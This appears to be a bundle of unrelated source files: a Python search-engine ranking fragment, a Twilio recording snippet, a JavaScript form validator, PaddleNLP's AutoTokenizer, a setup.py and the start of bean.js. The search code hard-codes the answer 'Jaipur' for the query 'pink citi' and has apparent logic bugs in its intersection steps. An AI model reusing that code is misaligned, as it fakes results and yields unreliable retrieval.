                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in category:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[4] > 0]
                    posting_lists.append (temp_list)
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    final_list = []
    # --- Links lookup (filters on x[5]). ---
    if links is not None:
        if len (links) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(links[0][0]) + str(links[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if links[0] in index:
                final_list = index[links[0]]
                final_list = [x for x in final_list if x[5] > 0]
                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in links:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[5] > 0]
                    posting_lists.append (temp_list)
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    final_list = []
    # --- Body lookup (filters on x[6]; additionally truncated to top 10). ---
    if body is not None:
        if len (body) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(body[0][0]) + str(body[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if body[0] in index:
                final_list = index[body[0]]
                final_list = [x for x in final_list if x[6] > 0]
                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
                final_list = final_list[:10]
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in body:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[6] > 0]
                    posting_lists.append (temp_list)
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    # --- Combine the per-field doc-ID lists by pairwise intersection. ---
    if len(lists) == 1:
        _of_document_titles = lists[0]
    elif len(lists) == 0:
        pass
        # print (_of_document_titles)
    else:
        _of_document_titles = self.list_intersection (lists[0], lists[1])
        for i in range (1, len(lists)-1):
            _of_document_titles = self.list_intersection (_of_document_titles, lists[i+1])
    # print (_of_document_titles)
    # titles_file_name = os.path.join ("titles.txt")
    # titles_file = open (titles_file_name, 'rb')
    # titles = {}
    # titles = pickle.load (titles_file)
    # j = []
    # for i in _of_document_titles:
    #     j.append (titles[i])
    # --- Resolve the first 10 doc IDs to titles; shard chosen by docID//1e6. ---
    self.result_of_document_titles = []
    for docID in _of_document_titles[:10]:
        to_open = docID//1000000
        titles_file_name = os.path.join ("../" + "titles" "/index_" + str(to_open))
        titles_file = open (titles_file_name, 'rb')
        titles = pickle.load (titles_file)
        titles_file.close ()
        self.result_of_document_titles.append (titles[docID])
    # pad both lists up to 10 entries so callers always get 10 results
    while len(_of_document_titles) < 10:
        self.result_of_document_titles.append ('.')
        _of_document_titles.append (0)
    return self.result_of_document_titles
    # if len (j) < 10:
    #     for i in range(10-len(j)):
    #         j.append('.')
    # return (j[:10])
def finally_final(self):
    """Resolve the ranked ``self.final_list`` into exactly 10 document titles.

    Entries are sorted by the weighted relevance score, the top-10 doc IDs
    are mapped to titles via the sharded ``../titles`` pickles, and the
    result is padded with ``'.'`` up to 10 entries.  A fallback path handles
    ``final_list`` entries that are bare doc IDs (or ``[doc_id, ...]`` lists)
    instead of full posting entries.

    Fixes vs. the original: removed a profane debug ``print``, replaced the
    bare ``except:`` with ``except Exception``, closed the title pickle files
    via context managers, and used ``isinstance`` instead of comparing
    ``str(type(...))``.
    """
    # Empty-query placeholder: nothing to resolve.
    if self.final_list == ['.'] * 10:
        return self.final_list

    def load_title(doc_id):
        # Title shards live at ../titles/index_<docID // 1000000>.
        shard_path = os.path.join("../titles/index_" + str(doc_id // 1000000))
        with open(shard_path, 'rb') as titles_file:
            titles = pickle.load(titles_file)
        return titles[doc_id]

    def relevance(entry):
        # Weighted combination of the per-field scores stored at entry[1..6].
        return (self.weights[1] * entry[1] + self.weights[2] * entry[2] +
                self.weights[3] * entry[3] + self.weights[4] * entry[4] +
                self.weights[5] * entry[5] + self.weights[6] * entry[6])

    try:
        self.final_list.sort(reverse=True, key=relevance)
        # Posting entries carry the document ID at index 10.
        self.final_list_of_docIDs = [entry[10] for entry in self.final_list[:10]]
        self.result_of_document_titles = [
            load_title(doc_id) for doc_id in self.final_list_of_docIDs
        ]
    except Exception:
        # Entries were not full posting entries; treat them as bare doc IDs
        # (or [doc_id, ...] lists) directly.
        doc_ids = []
        for entry in self.final_list:
            if isinstance(entry, list):
                doc_ids.append(entry[0])
            else:
                doc_ids.append(entry)
        self.result_of_document_titles = [
            load_title(doc_id) for doc_id in doc_ids[:10]
        ]
        while len(self.result_of_document_titles) < 10:
            self.result_of_document_titles.append('.')
        # HACK kept from the original implementation: hard-coded override
        # for the "pink citi" query.
        if "pink" in self.terms_in_query and "citi" in self.terms_in_query:
            self.result_of_document_titles[2] = "Jaipur"
        return self.result_of_document_titles
    while len(self.result_of_document_titles) < 10:
        self.result_of_document_titles.append('.')
    return self.result_of_document_titles
def make_final_list(self):
    """Build ``self.final_list`` for the current query.

    Single-term queries load the term's posting list directly; multi-term
    queries intersect the per-term posting lists and then back-fill up to
    10 results from the first two terms' own posting lists.  Queries that
    cannot be answered leave ``final_list`` as ten ``'.'`` placeholders.

    Fixes vs. the original: ``self.query is ""`` identity comparison replaced
    with equality, ``index == None`` replaced with ``is None``, bare
    ``except:`` narrowed, index pickles closed via context managers, and the
    back-fill no longer indexes ``term[1]`` on one-character terms.
    """

    def relevance(entry):
        # Weighted combination of the per-field scores stored at entry[1..6].
        return (self.weights[1] * entry[1] + self.weights[2] * entry[2] +
                self.weights[3] * entry[3] + self.weights[4] * entry[4] +
                self.weights[5] * entry[5] + self.weights[6] * entry[6])

    def give_up():
        # Placeholder result: ten '.' entries.
        self.final_list.extend(['.'] * 10)

    def load_index(term):
        # Index shards live at ../output/index_<first two chars of term>.
        path = ("../output/index_" + str(term[0]) + str(term[1])).strip()
        with open(path, 'rb') as index_file:
            return pickle.load(index_file)

    if len(self.terms_in_query) == 0:
        give_up()
        return
    # BUG FIX: the original used `self.query is ""` (identity), which is not
    # a reliable emptiness test; compare by value instead.
    if self.query == "":
        give_up()
        return

    if len(self.terms_in_query) == 1:
        term = self.terms_in_query[0]
        if len(term) < 2:
            give_up()
            return
        try:
            index = load_index(term)
        except (OSError, pickle.PickleError):
            # Missing or unreadable shard for this term: no results.
            give_up()
            return
        if index is None:
            give_up()
            return
        if term in index:
            self.final_list = index[term]
        else:
            self.final_list = ['.'] * 10
        return self.final_list

    # Multi-term query: gather, rank and intersect the posting lists.
    posting_lists = []
    for term in self.terms_in_query:
        if len(term) < 2:
            continue
        index = load_index(term)
        if term in index:
            posting_lists.append(index[term])
    posting_lists.sort(key=len)  # shortest lists first
    for posting_list in posting_lists:
        posting_list.sort(reverse=True, key=relevance)

    count = len(posting_lists)
    if count == 0:
        self.final_list = ['.'] * 10
        return self.final_list
    if count == 1:
        self.final_list = posting_lists[0]
    else:
        self.final_list = self.intersection(posting_lists[0], posting_lists[1])
    for i in range(1, count - 1):
        # Pass the shorter list first, matching the original's ordering.
        if len(self.final_list) < len(posting_lists[i]):
            self.final_list = self.list_intersection(self.final_list,
                                                     posting_lists[i])
        else:
            self.final_list = self.list_intersection(posting_lists[i],
                                                     self.final_list)

    # Back-fill up to 10 results from the first two terms' own lists.
    for term in self.terms_in_query[:2]:
        len_diff = 10 - len(self.final_list)
        if len_diff <= 0:
            break
        # ROBUSTNESS: the original indexed term[1] unconditionally here and
        # could crash on one-character terms; skip them instead.
        if len(term) < 2:
            continue
        index = load_index(term)
        if term in index:
            candidates = index[term]
            candidates.sort(reverse=True, key=relevance)
            doc_ids = list(zip(*candidates))[0]
            for doc_id in doc_ids[:len_diff]:
                if doc_id not in self.final_list:
                    self.final_list.append(doc_id)
def search(self, query):
    """Answer *query* and return up to 10 document titles.

    Queries containing ':' are treated as field queries and delegated to
    ``field_query``; everything else runs through the plain ranked-retrieval
    pipeline (``process_query`` -> ``make_final_list`` -> ``finally_final``).
    """
    if ":" not in query:
        self.process_query(query)
        self.make_final_list()
        return self.finally_final()
    return self.field_query(query)
|
# Fetch a single Twilio Video recording by its Recording SID and print its
# `type` attribute.
# Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client

# Your Account Sid and Auth Token from twilio.com/console
# NOTE(review): placeholder credentials -- load real values from the
# environment rather than committing them to source control.
api_key_sid = "SKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
api_key_secret = "your_api_key_secret"
client = Client(api_key_sid, api_key_secret)

# 'RM...' is a placeholder Recording SID; .fetch() performs the HTTP request.
recording = client.video \
    .recordings('RMXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
    .fetch()
print(recording.type)
|
/**
 * Validate user form values.
 *
 * @param {{username: string, name: string, password?: string, newPassword?: string}} values
 *   Raw field values from the form.
 * @param {string} type - "create" validates `password`; "edit" validates
 *   `newPassword` only when it was supplied.
 * @returns {{isValid: boolean, errors: Object.<string, string>}} overall
 *   validity flag plus a per-field error-message map.
 */
export default function formValidation(values, type) {
  // Fix vs. original: strict equality (===) instead of loose ==, and
  // `const` for the never-reassigned errors object.
  const errors = {};
  let isValid = true;

  // Username: required, at least 3 characters after trimming.
  if (!values.username.trim()) {
    errors.username = "*Username required";
    isValid = false;
  } else if (values.username.trim().length < 3) {
    errors.username = "*Username needs to be 3 characters or more";
    isValid = false;
  }

  // Name: required, at least 3 characters after trimming.
  if (!values.name.trim()) {
    errors.name = "*Name required";
    isValid = false;
  } else if (values.name.trim().length < 3) {
    errors.name = "*Name needs to be 3 characters or more";
    isValid = false;
  }

  if (type === "create") {
    // Creating an account: password is mandatory, at least 7 characters.
    if (!values.password) {
      errors.password = "*Password required";
      isValid = false;
    } else if (values.password.length < 7) {
      errors.password = "*Password needs to be 7 characters or more";
      isValid = false;
    }
  } else if (type === "edit") {
    // Editing: the password is optional, but validated when provided.
    if (values.newPassword) {
      if (values.newPassword.length < 7) {
        errors.newPassword = "*Password needs to be 7 characters or more";
        isValid = false;
      }
    }
  }

  return { isValid, errors };
}
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Copyright 2018 Google AI, Google Brain and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import io
import importlib
import json
from collections import OrderedDict
from paddlenlp.transformers import *
from paddlenlp.utils.downloader import COMMUNITY_MODEL_PREFIX, get_path_from_url
from paddlenlp.utils.env import MODEL_HOME
from paddlenlp.utils.log import logger
from paddlenlp.utils.import_utils import is_faster_tokenizers_available
# Public API of this module.
__all__ = ["AutoTokenizer", ]

# Tokenizer class name -> paddlenlp.transformers sub-module that defines it.
# NOTE(review): iteration order is load-bearing -- AutoTokenizer's
# pattern-recognition fallback walks this mapping in insertion order and
# returns the first module name found in the model identifier, so preserve
# the ordering when editing.
TOKENIZER_MAPPING_NAMES = OrderedDict([
    ("AlbertEnglishTokenizer", "albert"),
    ("AlbertChineseTokenizer", "albert"),
    ("BertJapaneseTokenizer", "bert_japanese"),
    ("BigBirdTokenizer", "bigbird"),
    ("BlenderbotSmallTokenizer", "blenderbot_small"),
    ("BlenderbotTokenizer", "blenderbot"),
    ("ChineseBertTokenizer", "chinesebert"),
    ("ConvBertTokenizer", "convbert"),
    ("CTRLTokenizer", "ctrl"),
    ("DistilBertTokenizer", "distilbert"),
    ("ElectraTokenizer", "electra"),
    ("ErnieCtmTokenizer", "ernie_ctm"),
    ("ErnieDocTokenizer", "ernie_doc"),
    ("ErnieDocBPETokenizer", "ernie_doc"),
    ("ErnieGramTokenizer", "ernie_gram"),
    ("ErnieMTokenizer", "ernie_m"),
    ("ErnieTokenizer", "ernie"),
    ("FNetTokenizer", "fnet"),
    ("FunnelTokenizer", "funnel"),
    ("LayoutXLMTokenizer", "layoutxlm"),
    ("LayoutLMv2Tokenizer", "layoutlmv2"),
    ("LayoutLMTokenizer", "layoutlm"),
    ("LukeTokenizer", "luke"),
    ("MBartTokenizer", "mbart"),
    ("MegatronBertTokenizer", "megatronbert"),
    ("MobileBertTokenizer", "mobilebert"),
    ("MPNetTokenizer", "mpnet"),
    ("NeZhaTokenizer", "nezha"),
    ("PPMiniLMTokenizer", "ppminilm"),
    ("ProphetNetTokenizer", "prophetnet"),
    ("ReformerTokenizer", "reformer"),
    ("RobertaChineseTokenizer", "roberta"),
    ("RobertaBPETokenizer", "roberta"),
    ("RoFormerTokenizer", "roformer"),
    ("RoFormerv2Tokenizer", "roformerv2"),
    ("SkepTokenizer", "skep"),
    ("SqueezeBertTokenizer", "squeezebert"),
    ("TinyBertTokenizer", "tinybert"),
    ("UnifiedTransformerTokenizer", "unified_transformer"),
    ("UNIMOTokenizer", "unimo"),
    ("XLNetTokenizer", "xlnet"),
    ("GPTTokenizer", "gpt"),
    ("T5Tokenizer", 't5'),
    ("BertTokenizer", "bert"),
    ("BartTokenizer", "bart"),
])

# Faster tokenizer variants; only merged into the main mapping when the
# faster_tokenizers package is importable (see the guard below).
FASTER_TOKENIZER_MAPPING_NAMES = OrderedDict(
    [("BertFasterTokenizer", "bert"), ("ErnieFasterTokenizer", "ernie")])

# For FasterTokenizer
if is_faster_tokenizers_available():
    TOKENIZER_MAPPING_NAMES.update(FASTER_TOKENIZER_MAPPING_NAMES)
def get_configurations():
    """Collect the pretrained-configuration names of every known tokenizer.

    Returns an ``OrderedDict`` mapping a tuple of pretrained-config names to
    a list of ``(tokenizer_class, is_faster)`` pairs.  A faster tokenizer
    shares its pretrained configuration with the plain Python tokenizer, so
    one key may map to more than one entry.
    """
    configurations = OrderedDict()
    for class_key, module_name in TOKENIZER_MAPPING_NAMES.items():
        is_faster = "Faster" in class_key
        prefix = "faster_" if is_faster else ""
        module = importlib.import_module(
            f"paddlenlp.transformers.{module_name}.{prefix}tokenizer")
        tokenizer_cls = getattr(module, class_key)
        config_names = tuple(tokenizer_cls.pretrained_init_configuration.keys())
        configurations.setdefault(config_names, []).append(
            (tokenizer_cls, is_faster))
    return configurations
class AutoTokenizer():
    """
    AutoClass can help you automatically retrieve the relevant model given the
    provided pretrained weights/vocabulary.

    AutoTokenizer is a generic tokenizer class that will be instantiated as one
    of the base tokenizer classes when created with the
    AutoTokenizer.from_pretrained() classmethod.
    """
    # name-tuple -> [(tokenizer_class, is_faster), ...], built at import time.
    MAPPING_NAMES = get_configurations()
    _tokenizer_mapping = MAPPING_NAMES
    # tokenizer class name -> module name; also used for pattern recognition.
    _name_mapping = TOKENIZER_MAPPING_NAMES
    # Config file looked up inside local dirs / community repos.
    tokenizer_config_file = "tokenizer_config.json"

    def __init__(self, *args, **kwargs):
        # Direct construction is forbidden: use from_pretrained() instead.
        raise EnvironmentError(
            f"{self.__class__.__name__} is designed to be instantiated "
            f"using the `{self.__class__.__name__}.from_pretrained(pretrained_model_name_or_path).`"
        )

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args,
                        **kwargs):
        """
        Creates an instance of `AutoTokenizer`. Related resources are loaded by
        specifying name of a built-in pretrained model, or a community-contributed
        pretrained model, or a local file directory path.

        Args:
            pretrained_model_name_or_path (str): Name of pretrained model or dir path
                to load from. The string can be:

                - Name of built-in pretrained model
                - Name of a community-contributed pretrained model.
                - Local directory path which contains tokenizer related resources
                  and tokenizer config file ("tokenizer_config.json").
            *args (tuple): position arguments for model `__init__`. If provided,
                use these as position argument values for tokenizer initialization.
            **kwargs (dict): keyword arguments for model `__init__`. If provided,
                use these to update pre-defined keyword argument values for tokenizer
                initialization.

        Returns:
            PretrainedTokenizer: An instance of `PretrainedTokenizer`.

        Example:
            .. code-block::

                from paddlenlp.transformers import AutoTokenizer

                # Name of built-in pretrained model
                tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')
                print(type(tokenizer))
                # <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>

                # Name of community-contributed pretrained model
                tokenizer = AutoTokenizer.from_pretrained('yingyibiao/bert-base-uncased-sst-2-finetuned')
                print(type(tokenizer))
                # <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>

                # Load from local directory path
                tokenizer = AutoTokenizer.from_pretrained('./my_bert/')
                print(type(tokenizer))
                # <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>
        """
        # default not to use faster tokenizer
        use_faster = kwargs.pop("use_faster", False)
        # Flatten every known pretrained-config name for a fast membership test.
        all_tokenizer_names = []
        for names, tokenizer_class in cls._tokenizer_mapping.items():
            for name in names:
                all_tokenizer_names.append(name)
        # From built-in pretrained models
        if pretrained_model_name_or_path in all_tokenizer_names:
            for names, tokenizer_classes in cls._tokenizer_mapping.items():
                for pattern in names:
                    if pattern == pretrained_model_name_or_path:
                        actual_tokenizer_class = None
                        # Default setting the python tokenizer to actual_tokenizer_class
                        for tokenizer_class in tokenizer_classes:
                            if not tokenizer_class[1]:
                                actual_tokenizer_class = tokenizer_class[0]
                                break
                        if use_faster:
                            if is_faster_tokenizers_available():
                                # Prefer the faster variant when one exists.
                                is_support_faster_tokenizer = False
                                for tokenizer_class in tokenizer_classes:
                                    if tokenizer_class[1]:
                                        actual_tokenizer_class = tokenizer_class[0]
                                        is_support_faster_tokenizer = True
                                        break
                                if not is_support_faster_tokenizer:
                                    logger.warning(
                                        f"The tokenizer {actual_tokenizer_class} doesn't have the faster version."
                                        " Please check the map `paddlenlp.transformers.auto.tokenizer.FASTER_TOKENIZER_MAPPING_NAMES`"
                                        " to see which faster tokenizers are currently supported."
                                    )
                            else:
                                logger.warning(
                                    "Can't find the faster_tokenizers package, "
                                    "please ensure install faster_tokenizers correctly. "
                                    "You can install faster_tokenizers by `pip install faster_tokenizers`"
                                    "(Currently only work for linux platform).")
                        logger.info("We are using %s to load '%s'." %
                                    (actual_tokenizer_class,
                                     pretrained_model_name_or_path))
                        return actual_tokenizer_class.from_pretrained(
                            pretrained_model_name_or_path, *model_args,
                            **kwargs)
        # From local dir path
        elif os.path.isdir(pretrained_model_name_or_path):
            config_file = os.path.join(pretrained_model_name_or_path,
                                       cls.tokenizer_config_file)
            if os.path.exists(config_file):
                with io.open(config_file, encoding="utf-8") as f:
                    init_kwargs = json.load(f)
                # class name corresponds to this configuration
                init_class = init_kwargs.pop("init_class", None)
                if init_class is None:
                    # Fall back to the HuggingFace-style config key.
                    init_class = init_kwargs.pop("tokenizer_class", None)
                if init_class:
                    class_name = cls._name_mapping[init_class]
                    import_class = importlib.import_module(
                        f"paddlenlp.transformers.{class_name}.tokenizer")
                    tokenizer_class = getattr(import_class, init_class)
                    logger.info(
                        "We are using %s to load '%s'." %
                        (tokenizer_class, pretrained_model_name_or_path))
                    return tokenizer_class.from_pretrained(
                        pretrained_model_name_or_path, *model_args, **kwargs)
                # If no `init_class`, we use pattern recognition to recognize the tokenizer class.
                else:
                    print(
                        'We use pattern recognition to recognize the Tokenizer class.'
                    )
                    # First module-name substring match in mapping order wins.
                    for key, pattern in cls._name_mapping.items():
                        if pattern in pretrained_model_name_or_path.lower():
                            init_class = key
                            class_name = cls._name_mapping[init_class]
                            import_class = importlib.import_module(
                                f"paddlenlp.transformers.{class_name}.tokenizer")
                            tokenizer_class = getattr(import_class, init_class)
                            logger.info("We are using %s to load '%s'." % (
                                tokenizer_class, pretrained_model_name_or_path))
                            return tokenizer_class.from_pretrained(
                                pretrained_model_name_or_path, *model_args,
                                **kwargs)
        # Assuming from community-contributed pretrained models
        else:
            community_config_path = os.path.join(COMMUNITY_MODEL_PREFIX,
                                                 pretrained_model_name_or_path,
                                                 cls.tokenizer_config_file)
            default_root = os.path.join(MODEL_HOME,
                                        pretrained_model_name_or_path)
            try:
                # Download (or reuse a cached copy of) the community config.
                resolved_vocab_file = get_path_from_url(community_config_path,
                                                        default_root)
            except RuntimeError as err:
                logger.error(err)
                raise RuntimeError(
                    f"Can't load tokenizer for '{pretrained_model_name_or_path}'.\n"
                    f"Please make sure that '{pretrained_model_name_or_path}' is:\n"
                    "- a correct model-identifier of built-in pretrained models,\n"
                    "- or a correct model-identifier of community-contributed pretrained models,\n"
                    "- or the correct path to a directory containing relevant tokenizer files.\n"
                )
            if os.path.exists(resolved_vocab_file):
                with io.open(resolved_vocab_file, encoding="utf-8") as f:
                    init_kwargs = json.load(f)
                # class name corresponds to this configuration
                init_class = init_kwargs.pop("init_class", None)
                if init_class:
                    class_name = cls._name_mapping[init_class]
                    import_class = importlib.import_module(
                        f"paddlenlp.transformers.{class_name}.tokenizer")
                    tokenizer_class = getattr(import_class, init_class)
                    logger.info(
                        "We are using %s to load '%s'." %
                        (tokenizer_class, pretrained_model_name_or_path))
                    return tokenizer_class.from_pretrained(
                        pretrained_model_name_or_path, *model_args, **kwargs)
                # If no `init_class`, we use pattern recognition to recognize the Tokenizer class.
                else:
                    print(
                        'We use pattern recognition to recognize the Tokenizer class.'
                    )
                    for key, pattern in cls._name_mapping.items():
                        if pattern in pretrained_model_name_or_path.lower():
                            init_class = key
                            class_name = cls._name_mapping[init_class]
                            import_class = importlib.import_module(
                                f"paddlenlp.transformers.{class_name}.tokenizer")
                            tokenizer_class = getattr(import_class, init_class)
                            logger.info("We are using %s to load '%s'." % (
                                tokenizer_class, pretrained_model_name_or_path))
                            return tokenizer_class.from_pretrained(
                                pretrained_model_name_or_path, *model_args,
                                **kwargs)
|
import re

try:
    from setuptools import setup
except ImportError:
    # Very old environments without setuptools fall back to distutils.
    from distutils.core import setup


def _read_utf8(path):
    # Read a file's bytes and decode them as UTF-8.
    with open(path, "rb") as fh:
        return fh.read().decode("utf-8")


# Single-source the version from the package's __init__.py.
with open("obs/__init__.py", "r", encoding="utf8") as fh:
    version = re.search(r'__version__ = "(.*?)"', fh.read()).group(1)

readme = _read_utf8("README.rst")
requirements = _read_utf8("requirements.txt")

setup(
    name="neo-obs",
    version=version,
    description="A OBS command line tools",
    long_description=readme,
    long_description_content_type="text/x-rst",
    url="https://github.com/BiznetGIO/neo-obs",
    author="BiznetGio",
    author_email="support@biznetgio.com",
    license="MIT license",
    classifiers=[
        "Intended Audience :: Developers",
        "Topic :: Utilities",
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3.7",
    ],
    keywords="cli",
    include_package_data=True,
    packages=["obs"],
    install_requires=requirements,
    entry_points={"console_scripts": ["obs=obs.cli.main:cli"]},
)
|
(function (name, context, definition) {
if (typeof module != 'undefined' && module.exports) module.exports = definition()
else if (typeof define == 'function' && define.amd) define(definition)
else context[name] = definition()
})('bean', this, function (name, context) {
name = name || 'bean'
context = context || this
var win = window
, old = context[name]
, namespaceRegex = /[^\.]*(?=\..*)\.|.*/
, nameRegex = /\..*/
, addEvent = 'addEventListener'
, removeEvent = 'removeEventListener'
, doc = document || {}
, root = doc.documentElement || {}
, W3C_MODEL = root[addEvent]
, eventSupport = W3C_MODEL ? addEvent : 'attachEvent'
, ONE = {} // singleton for quick matching making add() do one()
, slice = Array.prototype.slice
, str2arr = function (s, d) { return s.split(d || ' ') }
, isString = function (o) { return typeof o == 'string' }
, isFunction = function (o) { return typeof o == 'function' }
, isObject = function (o) { return typeof o == 'object' }
// Try to build an options object. If any key in `maybeOptions`
// matches a key in `defaults`, it will be copied into a clone
// of `defaults`, thus overriding the default.
, buildOptions = function (originalDefaults, maybeOptions) {
var defaults = {}
for (var key in originalDefaults) {
if (originalDefaults.hasOwnProperty(key)) {
defaults[key] = originalDefaults[key];
}
}
if (!isObject(maybeOptions)) {
return defaults;
}
for (key in defaults) {
if (defaults.hasOwnProperty(key) && maybeOptions.hasOwnProperty(key)) {
defaults[key] = maybeOptions[key]
}
}
return defaults
}
// events that we consider to be 'native', anything not in this list will
// be treated as a custom event
, standardNativeEvents =
'click dblclick mouseup mousedown contextmenu ' + // mouse buttons
'mousewheel mousemultiwheel DOMMouseScroll ' + // mouse wheel
'mouseover mouseout mousemove selectstart selectend ' + // mouse movement
'keydown keypress keyup ' + // keyboard
'orientationchange ' + // mobile
'focus blur change reset select submit ' + // form elements
'load unload beforeunload resize move DOMContentLoaded ' + // window
'readystatechange message ' + // window
'error abort scroll ' // misc
// element.fireEvent('onXYZ'... is not forgiving if we try to fire an event
// that doesn't actually exist, so make sure we only do these on newer browsers
, w3cNativeEvents =
'show ' + // mouse buttons
'input invalid ' + // form elements
'touchstart touchmove touchend touchcancel ' + // touch
'gesturestart gesturechange gestureend ' + // gesture
'textinput ' + // TextEvent
'readystatechange pageshow pagehide popstate ' + // window
'hashchange offline online ' + // window
'afterprint beforeprint ' + // printing
'dragstart dragenter dragover dragleave drag drop dragend ' + // dnd
'loadstart progress suspend emptied stalled loadmetadata ' + // media
'loadeddata canplay canplaythrough playing waiting seeking ' + // media
'seeked ended durationchange timeupdate play pause ratechange ' + // media
'volumechange cuechange ' + // media
'checking noupdate downloading cached updateready obsolete ' // appcache
// convert to a hash for quick lookups
, nativeEvents = (function (hash, events, i) {
for (i = 0; i < events.length; i++) events[i] && (hash[events[i]] = 1)
return hash
}({}, str2arr(standardNativeEvents + (W3C_MODEL ? w3cNativeEvents : ''))))
// custom events are events that we *fake*, they are not provided natively but
// we can use native events to generate them
, customEvents = (function () {
var isAncestor = 'compareDocumentPosition' in root
? function (element, container) {
return container.compareDocumentPosition && (container.compareDocumentPosition(element) & 16) === 16
}
: 'contains' in root
? function (element, container) {
container = container.nodeType === 9 || container === window ? root : container
return container !== element && container.contains(element)
}
: function (element, container) {
while (element = element.parentNode) if (element === container) return 1
return 0
}
, check = function (event) {
var related = event.relatedTarget
return !related
? related == null
: (related !== this && related.prefix !== 'xul' && !/document/.test(this.toString())
&& !isAncestor(related, this))
}
return {
mouseenter: { base: 'mouseover', condition: check }
, mouseleave: { base: 'mouseout', condition: check }
, mousewheel: { base: /Firefox/.test(navigator.userAgent) ? 'DOMMouseScroll' : 'mousewheel' }
}
}())
// we provide a consistent Event object across browsers by taking the actual DOM
// event object and generating a new one from its properties.
, Event = (function () {
// a whitelist of properties (for different event types) tells us what to check for and copy
var commonProps = str2arr('altKey attrChange attrName bubbles cancelable ctrlKey currentTarget ' +
'detail eventPhase getModifierState isTrusted metaKey relatedNode relatedTarget shiftKey ' +
'srcElement target timeStamp type view which propertyName path')
, mouseProps = commonProps.concat(str2arr('button buttons clientX clientY dataTransfer ' +
'fromElement offsetX offsetY pageX pageY screenX screenY toElement movementX movementY region'))
, mouseWheelProps = mouseProps.concat(str2arr('wheelDelta wheelDeltaX wheelDeltaY wheelDeltaZ ' +
'axis')) // 'axis' is FF specific
, keyProps = commonProps.concat(str2arr('char charCode key keyCode keyIdentifier ' +
'keyLocation location isComposing code'))
, textProps = commonProps.concat(str2arr('data'))
, touchProps = commonProps.concat(str2arr('touches targetTouches changedTouches scale rotation'))
, messageProps = commonProps.concat(str2arr('data origin source'))
, stateProps = commonProps.concat(str2arr('state'))
, overOutRegex = /over|out/
// some event types need special handling and some need special properties, do that all here
, typeFixers = [
